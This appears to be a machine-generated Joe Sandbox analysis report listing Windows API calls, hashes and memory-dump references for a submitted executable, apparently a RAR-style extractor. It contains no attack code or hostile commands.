                                                                                                                                                                                              • Opcode ID: a3cae33c8b95446fba8438a2a0e2f1dcbd12a6c9cbbacf5bd239155aa08b80b5
                                                                                                                                                                                              • Instruction ID: 00bac6dfe355c6e5a5a62ec7e0172c8c09e421300ba1fdae58a15318facefeec
                                                                                                                                                                                              • Opcode Fuzzy Hash: a3cae33c8b95446fba8438a2a0e2f1dcbd12a6c9cbbacf5bd239155aa08b80b5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 63F0E9B0885B059FDB348A30C54879277E86F53331F040B2ED1F242AE0D3B465CDAA40
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FA1316: GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
                                                                                                                                                                                                • Part of subcall function 00FA1316: SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370
                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00FBC2B1
                                                                                                                                                                                              • EndDialog.USER32(?,00000006), ref: 00FBC2C4
                                                                                                                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 00FBC2E0
                                                                                                                                                                                              • SetFocus.USER32(00000000), ref: 00FBC2E7
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00FBC321
                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00FBC358
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00FBC36E
                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FBC38C
                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FBC39C
                                                                                                                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FBC3B8
                                                                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FBC3D4
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FBC404
                                                                                                                                                                                                • Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00FBC417
                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00FBC41E
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FBC477
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00FBC48A
                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00FBC4A7
                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00FBC4C7
                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FBC4D7
                                                                                                                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FBC4F1
                                                                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FBC509
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FBC535
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00FBC548
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FBC59C
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00FBC5AF
                                                                                                                                                                                                • Part of subcall function 00FBAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FBAF35
                                                                                                                                                                                                • Part of subcall function 00FBAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00FDE72C,?,?), ref: 00FBAF84
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                                                              • API String ID: 797121971-1840816070
                                                                                                                                                                                              • Opcode ID: 86bfc2592debaedda42f5ed4e67afffb37e05fb2e7e981a7f215ac5966496343
                                                                                                                                                                                              • Instruction ID: f4c4442e130af8b7cb4fe813031a6886e9bd79a4861b7309068e9f12e02b62b6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 86bfc2592debaedda42f5ed4e67afffb37e05fb2e7e981a7f215ac5966496343
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B9184B2648349BFD231DBA1CC49FFB77ACEB4A700F044819F785D6181D775A604AB62
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FA6FAA
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA7013
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA7084
                                                                                                                                                                                                • Part of subcall function 00FA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FA7AAB
                                                                                                                                                                                                • Part of subcall function 00FA7A9C: GetLastError.KERNEL32 ref: 00FA7AF1
                                                                                                                                                                                                • Part of subcall function 00FA7A9C: CloseHandle.KERNEL32(?), ref: 00FA7B00
                                                                                                                                                                                                • Part of subcall function 00FAA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00FA977F,?,?,00FA95CF,?,?,?,?,?,00FD2641,000000FF), ref: 00FAA1F1
                                                                                                                                                                                                • Part of subcall function 00FAA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00FA977F,?,?,00FA95CF,?,?,?,?,?,00FD2641), ref: 00FAA21F
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00FA7139
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FA7155
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00FA7298
                                                                                                                                                                                                • Part of subcall function 00FA9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00FA73BC,?,?,?,00000000), ref: 00FA9DBC
                                                                                                                                                                                                • Part of subcall function 00FA9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00FA9E70
                                                                                                                                                                                                • Part of subcall function 00FA9620: CloseHandle.KERNELBASE(000000FF,?,?,00FA95D6,?,?,?,?,?,00FD2641,000000FF), ref: 00FA963B
                                                                                                                                                                                                • Part of subcall function 00FAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FAA325,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA501
                                                                                                                                                                                                • Part of subcall function 00FAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FAA325,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA532
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                              • API String ID: 3983180755-3508440684
                                                                                                                                                                                              • Opcode ID: 997448f6171a7ad2d693f779048789fdfbe44a3cdd1f02b39b1462b89f878912
                                                                                                                                                                                              • Instruction ID: cf102abe102e8d07b09b7da065bcf1382d5939f99557f789e73aeaf2b0c607de
                                                                                                                                                                                              • Opcode Fuzzy Hash: 997448f6171a7ad2d693f779048789fdfbe44a3cdd1f02b39b1462b89f878912
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AC1E8B1D04745AEDB21EB74CC41FEEB7ACAF05310F04455AFA56E3282D734AA44EB61
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                                              • Opcode ID: 9a453da398600c64f85008d511bea559c112db14106670afb90aa222df136819
                                                                                                                                                                                              • Instruction ID: 4e2e0e5c846bd9fa466af3dc491ebe43813e004875e7ccb06efbbbf98dcd726b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a453da398600c64f85008d511bea559c112db14106670afb90aa222df136819
                                                                                                                                                                                              • Instruction Fuzzy Hash: 23C25F72E0462A8FDB25CE28DE41BE9B7B5EB44314F1441EED44EE7240E779AE819F40
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog_swprintf
                                                                                                                                                                                              • String ID: CMT$h%u$hc%u
                                                                                                                                                                                              • API String ID: 146138363-3282847064
                                                                                                                                                                                              • Opcode ID: eba983ce0b4af1b837ea25cb1dacb1295bea2f6bde0fa4642027b73bfb1aa6a7
                                                                                                                                                                                              • Instruction ID: 3f443c7a2abafed3332f5721a363efe89933bd0a4a386982d1ca9d2862dfbc08
                                                                                                                                                                                              • Opcode Fuzzy Hash: eba983ce0b4af1b837ea25cb1dacb1295bea2f6bde0fa4642027b73bfb1aa6a7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4132E6B15103849FDF14DF74C895AE93BA5AF56300F08447DFD8A8B283DB74AA49DB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FA2874
                                                                                                                                                                                              • _strlen.LIBCMT ref: 00FA2E3F
                                                                                                                                                                                                • Part of subcall function 00FB02BA: __EH_prolog.LIBCMT ref: 00FB02BF
                                                                                                                                                                                                • Part of subcall function 00FB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00FABAE9,00000000,?,?,?,00010416), ref: 00FB1BA0
                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA2F91
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                                                                                              • String ID: CMT
                                                                                                                                                                                              • API String ID: 1206968400-2756464174
                                                                                                                                                                                              • Opcode ID: 46c42aceb7c5740681e7c8a77566c3bd64c9b1ebb51cde5ef85f24de9bfc3d63
                                                                                                                                                                                              • Instruction ID: 0485251e30367ae7caebdb08188ae1e1050db583a489d04c578efcd6ff0bf32e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 46c42aceb7c5740681e7c8a77566c3bd64c9b1ebb51cde5ef85f24de9bfc3d63
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E621AB1A002458FDB19DF38C8857EA37A1FF56310F08457EFC9A8B282DB759945EB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FBF844
                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00FBF910
                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FBF930
                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00FBF93A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                              • Opcode ID: bf3103d3e05579b3202af06d9e51ce7746da50f1779635dbe9282bffa0f8d242
                                                                                                                                                                                              • Instruction ID: 6c829a429deeb7de68d753331982b75dc5259e8daef6d8ac27ada2a34fac2d2a
                                                                                                                                                                                              • Opcode Fuzzy Hash: bf3103d3e05579b3202af06d9e51ce7746da50f1779635dbe9282bffa0f8d242
                                                                                                                                                                                              • Instruction Fuzzy Hash: B1312975D0631D9BDB20DFA5DD897CCBBB8AF08304F1041AAE50CAB250EB759B889F45
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualQuery.KERNEL32(80000000,00FBE5E8,0000001C,00FBE7DD,00000000,?,?,?,?,?,?,?,00FBE5E8,00000004,01001CEC,00FBE86D), ref: 00FBE6B4
                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00FBE5E8,00000004,01001CEC,00FBE86D), ref: 00FBE6CF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InfoQuerySystemVirtual
                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                              • API String ID: 401686933-2746444292
                                                                                                                                                                                              • Opcode ID: 9c6c50e3f67f606d5c8f71dc5ad18005b54843526a0e6e6e6bbe861fe59f3f74
                                                                                                                                                                                              • Instruction ID: dab495ed5fceb39b7647391129ae723b12f24855949989f9f0888b53b3ae99ed
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c6c50e3f67f606d5c8f71dc5ad18005b54843526a0e6e6e6bbe861fe59f3f74
                                                                                                                                                                                              • Instruction Fuzzy Hash: F701F732A001096BDB14DE29DC09BDD7BAAAFC4334F1CC121ED19D7251DA38D9059A80
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00FC8FB5
                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00FC8FBF
                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00FC8FCC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                              • Opcode ID: 38dfa5a8aef8a7a6242896d38bfe82ea42fb63fd8cbd79332fcf3cec4afeba02
                                                                                                                                                                                              • Instruction ID: 2b8ad2dca884aa17c26430788bcdcf66bd76386de9aad14b5de68b47dd39dbed
                                                                                                                                                                                              • Opcode Fuzzy Hash: 38dfa5a8aef8a7a6242896d38bfe82ea42fb63fd8cbd79332fcf3cec4afeba02
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B31E474D0121DABCB21DF24DD89BDCBBB8AF08310F5041EAE41CA6250EB349F859F44
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                                                                                              • Instruction ID: 584b84fae4b5128d84fe8e58136bb7f277403880bac88e1021b8182fd563e92e
                                                                                                                                                                                              • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 05021C71E0021A9BDF14CFA9C981BADB7F1EF88324F25816ED919E7384D731A941DB90
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FBAF35
                                                                                                                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00FDE72C,?,?), ref: 00FBAF84
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2169056816-0
                                                                                                                                                                                              • Opcode ID: 99d269863975d8760eb509da7e7a372dcb66f6caa9f33e22dac6ca3c6dcf13d0
                                                                                                                                                                                              • Instruction ID: e0e14df3e6fe99fdf833b9a2288d8973a89591e390098f5ec3249a283c642abd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 99d269863975d8760eb509da7e7a372dcb66f6caa9f33e22dac6ca3c6dcf13d0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B015E7A50031DAAD7109F75DC45FAA77BDEF08710F404022FB1597261D370AA18DBA5
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32(00FA6DDF,00000000,00000400), ref: 00FA6C74
                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00FA6C95
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                                              • Opcode ID: 3dd90f91a34956409c3e88e164a1069e2039bd593607911e365ac2338e2cf530
                                                                                                                                                                                              • Instruction ID: ce6cabacb732250c41d01f7d98fcb2ea7b8b003df07acedfca8d63bd13f350ca
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dd90f91a34956409c3e88e164a1069e2039bd593607911e365ac2338e2cf530
                                                                                                                                                                                              • Instruction Fuzzy Hash: B5D0C971345300BFFA110B719D0AF2A7B9ABF56B66F18C405B795E80E0DA749424B62A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FD19EF,?,?,00000008,?,?,00FD168F,00000000), ref: 00FD1C21
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
